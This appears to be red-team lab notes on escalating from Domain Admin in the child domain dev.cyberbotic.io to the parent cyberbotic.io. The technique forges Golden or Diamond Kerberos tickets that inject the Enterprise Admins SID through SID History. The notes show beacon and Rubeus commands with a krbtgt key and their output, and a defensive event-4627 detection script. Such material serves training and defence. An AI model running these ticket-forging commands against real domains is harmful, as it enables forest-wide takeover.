When a child domain is added to a forest, it automatically creates a transitive, two-way trust with its parent. This can be found in the lab where dev.cyberbotic.io is a child domain of cyberbotic.io.
In the trust enumeration output, SourceName is the current domain, TargetName is the foreign domain, TrustDirection is the direction of the trust (Bidirectional means two-way), and a TrustAttributes value of WITHIN_FOREST tells us that both domains are part of the same forest, which implies a parent/child relationship.
If we have Domain Admin privileges in the child, we can also gain Domain Admin privileges in the parent using a TGT with a special attribute called SID History. SID History was designed to support migration scenarios, where a user is moved from one domain to another. To preserve access to resources in the "old" domain, the user's previous SID is added to the SID History of their new account. When forging such a ticket, the SID of a privileged group (Enterprise Admins, Domain Admins, etc.) in the parent domain can be added to it, which grants access to all resources in the parent.
This can be achieved using either a Golden or Diamond Ticket.
Golden Ticket
The process is the same as creating Golden Tickets previously; the only additional information required is the SID of a target group in the parent domain.
Then import it into a logon session and use it to access the domain controller in the parent.
beacon> run klist
Current LogonId is 0:0x3a6665
Cached Tickets: (1)
#0> Client: Administrator @ DEV.CYBERBOTIC.IO
Server: krbtgt/dev.cyberbotic.io @ DEV.CYBERBOTIC.IO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
beacon> ls \\dc-1.cyberbotic.io\c$
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2022 15:26:54 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 05/08/2021 08:20:24 PerfLogs
dir 08/24/2022 11:11:21 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 09/08/2022 17:33:33 ProgramData
dir 08/15/2022 15:07:48 Recovery
dir 08/24/2022 11:05:32 Shares
dir 08/31/2022 16:44:18 System Volume Information
dir 08/15/2022 15:09:04 Users
dir 08/24/2022 11:10:45 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
12kb fil 09/12/2022 08:36:09 DumpStack.log.tmp
384mb fil 09/12/2022 08:36:09 pagefile.sys
Diamond Ticket
The Rubeus diamond command also has a /sids parameter, with which we can supply the extra SIDs we want in our ticket.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:519 /sids:S-1-5-21-2594061375-675613155-814674916-519 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap
[*] Action: Diamond Ticket
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc-2.dev.cyberbotic.io'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: KT+juea5lxCbxNfLLWbgRorvmR+gRkaoifHatrHE0GE=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIF1j[...]5JTw==
[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT
[*] base64(ticket.kirbi):
doIGAj[...]lDLklP
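A defender-side check for this technique, added here as an example and not part of the original notes: the injected parent-domain SID shows up in the logon token of a child-domain account, so token group membership (as recorded in Windows security event 4627, "Group membership information") can be scanned for privileged RIDs whose domain identifier differs from the account's own. The -519 SID is the cyberbotic.io Enterprise Admins SID quoted above; the DEV domain identifier and the event records are constructed placeholders.

```python
"""Flag logons whose token carries a privileged group SID from a different
domain than the account itself, the footprint of SID History injection."""
import re

# Well-known RIDs of groups an attacker would inject via SID History.
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}
# Domain SIDs look like S-1-5-21-<a>-<b>-<c>-<RID>; built-in SIDs (S-1-5-32-*) do not match.
SID_RE = re.compile(r"^(S-1-5-21(?:-\d+){3})-(\d+)$")

def split_sid(sid):
    """Return (domain identifier, RID) for a domain SID, or None if it is not one."""
    m = SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else None

def find_foreign_privileged_sids(account_sid, group_sids):
    """Return (sid, group name) pairs for privileged SIDs whose domain part differs
    from the account's. A child-domain account normally holds child-domain groups;
    a parent-domain Enterprise Admins SID in its token is what the forged ticket adds."""
    acct = split_sid(account_sid)
    hits = []
    for sid in group_sids:
        parsed = split_sid(sid)
        if acct and parsed and parsed[1] in PRIVILEGED_RIDS and parsed[0] != acct[0]:
            hits.append((sid, PRIVILEGED_RIDS[parsed[1]]))
    return hits

def scan_events(events):
    """events: dicts shaped like the fields of a 4627 event (account, account SID, group SIDs)."""
    alerts = []
    for ev in events:
        hits = find_foreign_privileged_sids(ev["account_sid"], ev["group_sids"])
        if hits:
            alerts.append((ev["account"], hits))
    return alerts

# Constructed sample data: the DEV domain identifier is a made-up placeholder,
# the -519 SID is the cyberbotic.io Enterprise Admins SID used in the notes.
DEV_DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"  # placeholder, not a real domain SID
SAMPLE_EVENTS = [
    {"account": "DEV\\Administrator", "account_sid": DEV_DOMAIN + "-500",   # normal logon
     "group_sids": [DEV_DOMAIN + "-512", DEV_DOMAIN + "-513", "S-1-5-32-544"]},
    {"account": "DEV\\Administrator", "account_sid": DEV_DOMAIN + "-500",   # forged ticket
     "group_sids": [DEV_DOMAIN + "-512", "S-1-5-21-2594061375-675613155-814674916-519"]},
]

if __name__ == "__main__":
    for account, hits in scan_events(SAMPLE_EVENTS):
        print(f"ALERT {account}: foreign privileged SIDs in token: {hits}")
```

Cross-domain membership in universal groups such as Enterprise Admins can be legitimate, so treat a hit as a lead to compare against the account's real group membership in the parent domain rather than as proof of forgery.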
If dev.cyberbotic.io also had a child (e.g. test.dev.cyberbotic.io), then a DA in TEST would be able to use their krbtgt in the same way to hop straight to DA/EA in cyberbotic.io, because the trusts are transitive.
There are also other means which do not require DA in the child. For example, you can also Kerberoast and AS-REP roast across domain trusts, which may lead to privileged credential disclosure. Because principals in CYBER can be granted access to resources in DEV, you may find instances where they are accessing machines we have already compromised. If they interact with a machine that has unconstrained delegation, we can capture their TGTs. If they have an interactive session on a machine, such as RDP, we can impersonate them just like any other user.